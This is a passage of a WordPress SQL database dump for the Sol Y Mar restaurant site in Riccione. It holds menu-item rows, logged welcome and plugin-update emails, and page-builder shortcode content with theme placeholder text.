17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/3890/',9,'nav_menu_item','',0),(3891,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3891','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/3891/',10,'nav_menu_item','',0),(3892,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3892','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3039,'https://www.ristorantesolymar.it/2021/01/20/3892/',46,'nav_menu_item','',0),(3893,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3893','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3039,'https://www.ristorantesolymar.it/2021/01/20/3893/',45,'nav_menu_item','',0),(3894,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3894','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3039,'https://www.ristorantesolymar.it/2021/01/20/3894/',90,'nav_menu_item','',0),(3895,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3895','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3039,'https://www.ristorantesolymar.it/2021/01/20/3895/',89,'nav_menu_item','',0),(3896,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3896','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3039,'https://www.ristorantesolymar.it/2021/01/20/3896/',56,'nav_menu_item','',0),(3897,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3897','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3039,'https://www.ristorantesolymar.it/2021/01/20/3897/',100,'nav_menu_item','',0),(3898,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3898','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3039,'https://www.ristorantesolymar.it/2021/01/20/3898/',83,'nav_menu_item','',0),(3899,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3899','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',3039,'https://www.ristorantesolymar.it/2021/01/20/3899/',39,'nav_menu_item','',0),(3900,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3900','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/3900/',12,'nav_menu_item','',0),(3901,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3901','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/3901/',18,'nav_menu_item','',0),(3902,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3902','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/3902/',21,'nav_menu_item','',0),(3903,1,'2021-01-20 18:24:40','2021-01-20 17:24:40',' ','','','publish','closed','closed','','3903','','','2021-01-20 18:24:40','2021-01-20 17:24:40','',0,'https://www.ristorantesolymar.it/2021/01/20/3903/',16,'nav_menu_item','',0),(3904,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3904','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/3904/',14,'nav_menu_item','',0),(3905,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3905','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/3905/',17,'nav_menu_item','',0),(3906,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3906','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/3906/',20,'nav_menu_item','',0),(3907,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3907','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/3907/',19,'nav_menu_item','',0),(3908,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3908','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/3908/',15,'nav_menu_item','',0),(3909,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3909','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',3039,'https://www.ristorantesolymar.it/2021/01/20/3909/',93,'nav_menu_item','',0),(3910,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3910','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',3039,'https://www.ristorantesolymar.it/2021/01/20/3910/',49,'nav_menu_item','',0),(3911,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3911','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',3039,'https://www.ristorantesolymar.it/2021/01/20/3911/',57,'nav_menu_item','',0),(3912,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3912','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',3039,'https://www.ristorantesolymar.it/2021/01/20/3912/',101,'nav_menu_item','',0),(3913,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3913','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',3039,'https://www.ristorantesolymar.it/2021/01/20/3913/',76,'nav_menu_item','',0),(3914,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3914','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',3039,'https://www.ristorantesolymar.it/2021/01/20/3914/',32,'nav_menu_item','',0),(3915,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3915','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/3915/',14,'nav_menu_item','',0),(3916,1,'2021-01-20 18:24:41','2021-01-20 17:24:41','','Standard','','publish','closed','closed','','standard-2','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/standard-2/',18,'nav_menu_item','',0),(3917,1,'2021-01-20 18:24:41','2021-01-20 17:24:41','','Gallery','','publish','closed','closed','','gallery-2','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/gallery-2/',19,'nav_menu_item','',0),(3918,1,'2021-01-20 18:24:41','2021-01-20 17:24:41','','Link','','publish','closed','closed','','link-2','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/link-2/',20,'nav_menu_item','',0),(3919,1,'2021-01-20 18:24:41','2021-01-20 17:24:41','','Quote','','publish','closed','closed','','quote-2','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/quote-2/',21,'nav_menu_item','',0),(3920,1,'2021-01-20 18:24:41','2021-01-20 17:24:41','','Video','','publish','closed','closed','','video-2','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/video-2/',22,'nav_menu_item','',0),(3921,1,'2021-01-20 18:24:41','2021-01-20 17:24:41','','Audio','','publish','closed','closed','','audio-2','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/audio-2/',23,'nav_menu_item','',0),(3922,1,'2021-01-20 18:24:41','2021-01-20 17:24:41','','Small Slider','','publish','closed','closed','','small-slider-5','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/small-slider-5/',66,'nav_menu_item','',0),(3923,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3923','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/3923/',4,'nav_menu_item','',0),(3924,1,'2021-01-20 18:24:41','2021-01-20 17:24:41','','Big Images','','publish','closed','closed','','big-images-6','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/big-images-6/',40,'nav_menu_item','',0),(3925,1,'2021-01-20 18:24:41','2021-01-20 17:24:41','','Small Images','','publish','closed','closed','','small-images-6','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/small-images-6/',41,'nav_menu_item','',0),(3926,1,'2021-01-20 18:24:41','2021-01-20 17:24:41','','Big Slider','','publish','closed','closed','','big-slider-6','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/big-slider-6/',42,'nav_menu_item','',0),(3927,1,'2021-01-20 18:24:41','2021-01-20 17:24:41','','Small Slider','','publish','closed','closed','','small-slider-6','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/small-slider-6/',43,'nav_menu_item','',0),(3928,1,'2021-01-20 18:24:41','2021-01-20 17:24:41','','Big Gallery','','publish','closed','closed','','big-gallery-6','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/big-gallery-6/',44,'nav_menu_item','',0),(3929,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3929','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',3039,'https://www.ristorantesolymar.it/2021/01/20/3929/',50,'nav_menu_item','',0),(3930,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3930','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',3039,'https://www.ristorantesolymar.it/2021/01/20/3930/',94,'nav_menu_item','',0),(3931,1,'2021-01-20 18:24:41','2021-01-20 17:24:41','','Single Types','','publish','closed','closed','','single-types-9','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/single-types-9/',24,'nav_menu_item','',0),(3932,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3932','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/3932/',16,'nav_menu_item','',0),(3933,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3933','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/3933/',15,'nav_menu_item','',0),(3934,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3934','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/3934/',25,'nav_menu_item','',0),(3935,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3935','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',0,'https://www.ristorantesolymar.it/2021/01/20/3935/',24,'nav_menu_item','',0),(3936,1,'2021-01-20 18:24:41','2021-01-20 17:24:41',' ','','','publish','closed','closed','','3936','','','2021-01-20 18:24:41','2021-01-20 17:24:41','',3061,'https://www.ristorantesolymar.it/2021/01/20/3936/',48,'nav_menu_item','',0),(3937,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3937','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3937/',25,'nav_menu_item','',0),(3938,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3938','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3938/',23,'nav_menu_item','',0),(3939,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3939','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3939/',51,'nav_menu_item','',0),(3940,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3940','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3940/',50,'nav_menu_item','',0),(3941,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3941','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3941/',53,'nav_menu_item','',0),(3942,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3942','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3942/',52,'nav_menu_item','',0),(3943,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3943','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3943/',29,'nav_menu_item','',0),(3944,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3944','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3944/',28,'nav_menu_item','',0),(3945,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3945','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3945/',27,'nav_menu_item','',0),(3946,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3946','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3946/',30,'nav_menu_item','',0),(3947,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3947','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3947/',37,'nav_menu_item','',0),(3948,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3948','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3948/',60,'nav_menu_item','',0),(3949,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3949','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3039,'https://www.ristorantesolymar.it/2021/01/20/3949/',77,'nav_menu_item','',0),(3950,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3950','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3039,'https://www.ristorantesolymar.it/2021/01/20/3950/',33,'nav_menu_item','',0),(3951,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3951','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3039,'https://www.ristorantesolymar.it/2021/01/20/3951/',40,'nav_menu_item','',0),(3952,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3952','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3039,'https://www.ristorantesolymar.it/2021/01/20/3952/',41,'nav_menu_item','',0),(3953,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3953','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3039,'https://www.ristorantesolymar.it/2021/01/20/3953/',84,'nav_menu_item','',0),(3954,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3954','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3039,'https://www.ristorantesolymar.it/2021/01/20/3954/',85,'nav_menu_item','',0),(3955,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3955','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3955/',47,'nav_menu_item','',0),(3956,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3956','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3956/',46,'nav_menu_item','',0),(3957,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3957','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3957/',22,'nav_menu_item','',0),(3958,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3958','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3958/',21,'nav_menu_item','',0),(3959,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3959','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3959/',24,'nav_menu_item','',0),(3960,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3960','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3960/',23,'nav_menu_item','',0),(3961,1,'2021-01-20 18:24:42','2021-01-20 17:24:42','','Three Columns','','publish','closed','closed','','three-columns-6','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/three-columns-6/',32,'nav_menu_item','',0),(3962,1,'2021-01-20 18:24:42','2021-01-20 17:24:42','','Four Columns Wide','','publish','closed','closed','','four-columns-wide-6','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/four-columns-wide-6/',34,'nav_menu_item','',0),(3963,1,'2021-01-20 18:24:42','2021-01-20 17:24:42','','Four Columns','','publish','closed','closed','','four-columns-6','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/four-columns-6/',33,'nav_menu_item','',0),(3964,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3964','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3964/',61,'nav_menu_item','',0),(3965,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3965','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/3965/',38,'nav_menu_item','',0),(3966,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3966','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',0,'https://www.ristorantesolymar.it/2021/01/20/3966/',10,'nav_menu_item','',0),(3967,1,'2021-01-20 18:24:42','2021-01-20 17:24:42',' ','','','publish','closed','closed','','3967','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',0,'https://www.ristorantesolymar.it/2021/01/20/3967/',10,'nav_menu_item','',0),(3968,1,'2021-01-20 18:24:42','2021-01-20 17:24:42','','FIve Columns Wide','','publish','closed','closed','','five-columns-wide-5','','','2021-01-20 18:24:42','2021-01-20 17:24:42','',3061,'https://www.ristorantesolymar.it/2021/01/20/five-columns-wide-5/',58,'nav_menu_item','',0),(3969,1,'2021-01-20 18:24:43','2021-01-20 17:24:43','','FIve Columns Wide','','publish','closed','closed','','five-columns-wide-6','','','2021-01-20 18:24:43','2021-01-20 17:24:43','',3061,'https://www.ristorantesolymar.it/2021/01/20/five-columns-wide-6/',35,'nav_menu_item','',0),(3970,1,'2021-01-20 18:24:43','2021-01-20 17:24:43','','Six Columns Wide','','publish','closed','closed','','six-columns-wide-5','','','2021-01-20 18:24:43','2021-01-20 17:24:43','',3061,'https://www.ristorantesolymar.it/2021/01/20/six-columns-wide-5/',59,'nav_menu_item','',0),(3971,1,'2021-01-20 18:24:43','2021-01-20 17:24:43','','Six Columns Wide','','publish','closed','closed','','six-columns-wide-6','','','2021-01-20 18:24:43','2021-01-20 17:24:43','',3061,'https://www.ristorantesolymar.it/2021/01/20/six-columns-wide-6/',36,'nav_menu_item','',0),(3972,0,'2021-01-20 18:27:34','2021-01-20 17:27:34','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi franzoni.elena,</p>\n<p style=\"margin: 0 0 16px\">Thanks for creating an account on Sol Y Mar. Your username is <strong>franzoni.elena</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar account has been created!','','private','closed','closed','','your-sol-y-mar-account-has-been-created-8','','','2021-01-20 18:27:34','2021-01-20 17:27:34','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-account-has-been-created-8/',0,'postman_sent_mail','',0),(4624,0,'2021-02-22 13:52:56','2021-02-22 12:52:56','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (da versione 3.1.5 a 3.1.6)\n- Really Simple SSL (da versione 4.0.8 a 4.0.9)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-11','','','2021-02-22 13:52:56','2021-02-22 12:52:56','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-11/',0,'postman_sent_mail','',0),(4625,0,'2021-02-23 02:08:29','2021-02-23 01:08:29','Ciao! Il tuo sito su https://www.ristorantesolymar.it/vecchio è stato aggiornato automaticamente a WordPress 5.6.2.\n\nNon è richiesta da parte tua alcuna altra operazione. Per altre informazioni sulla versione 5.6.2 vedi la schermata Informazioni su WordPress:\nhttps://www.ristorantesolymar.it/vecchio/wp-admin/about.php\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nVi sono anche alcuni plugin o temi con aggiornamenti disponibili. Aggiornali ora:\nhttps://www.ristorantesolymar.it/vecchio/wp-admin/\n\nIl team di WordPress\n','[Sol Y Mar] Il tuo sito è aggiornato a WordPress 5.6.2','','private','closed','closed','','sol-y-mar-il-tuo-sito-e-aggiornato-a-wordpress-5-6-2','','','2021-02-23 02:08:29','2021-02-23 01:08:29','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-il-tuo-sito-e-aggiornato-a-wordpress-5-6-2/',0,'postman_sent_mail','',0),(3978,1,'2021-01-23 18:25:01','2021-01-23 17:25:01','<p>[vc_row content_placement=\"middle\" row_content_width=\"grid\" content_text_aligment=\"right\" css=\".vc_custom_1535635181617{padding-top: 130px !important;}\"][vc_column width=\"2/3\" offset=\"vc_col-lg-4 vc_col-md-8 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_1367_1600=\"0 0 0% 0\" item_padding_1025_1366=\"0 0 0% 0\" item_padding_769_1024=\"0 0 11% 0\" item_padding_681_768=\"0 0 13% 0\" item_padding_680=\"0 0 20% 0\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Siamo aperti\" title_break_words=\"1\" text=\"Attica Fine Dining Restaurant<br />\nRainbow Ridge Dr street 35<br />\nNY City, NY\" text_margin=\"45px\" line_margin=\"50px 14% 0 20%\"]Dal martedì alla domenica<br />\n12.00 - 14.30[/mkdf_section_title][vc_empty_space height=\"62px\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\" offset=\"vc_col-lg-1 vc_col-md-4 vc_hidden-xs\"][/vc_column][vc_column offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][vc_column_text]</p>\n<p style=\"text-align: left;\">Puoi prenotare il tuo evento speciale</p>\n<p><a href=\"https://www.ristorantesolymar.it/acquista-cena/\">Vai</a>[/vc_column_text][vc_empty_space height=\"55px\"][/vc_column][vc_column offset=\"vc_col-lg-3 vc_col-md-12 vc_col-xs-12\"][vc_column_text]</p>\n<p style=\"text-align: left;\">Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.</p>\n<p>[/vc_column_text][vc_empty_space height=\"85px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column width=\"2/3\" offset=\"vc_col-lg-4 vc_col-md-8 vc_hidden-xs\"][/vc_column][vc_column width=\"1/3\" offset=\"vc_col-lg-4 vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1535116332165{margin-top: -50px !important;margin-bottom: -210px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"2120\" image_size=\"full\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" content_text_aligment=\"center\" css=\".vc_custom_1534504832287{padding-top: 100px !important;padding-bottom: 200px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h5\" disable_break_words=\"no\" line_margin=\"20px 0 -10px 50%\" line_length=\"45px\" title=\"Reservation\"][/mkdf_section_title][contact-form-7 id=\"203\"][/vc_column][/vc_row]</p>\n','Orari di apertura','','inherit','closed','closed','','3059-autosave-v1','','','2021-01-23 18:25:01','2021-01-23 17:25:01','',3059,'https://www.ristorantesolymar.it/2021/01/20/3059-autosave-v1/',0,'revision','',0),(3980,1,'2021-01-20 18:46:14','2021-01-20 17:46:14','[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" 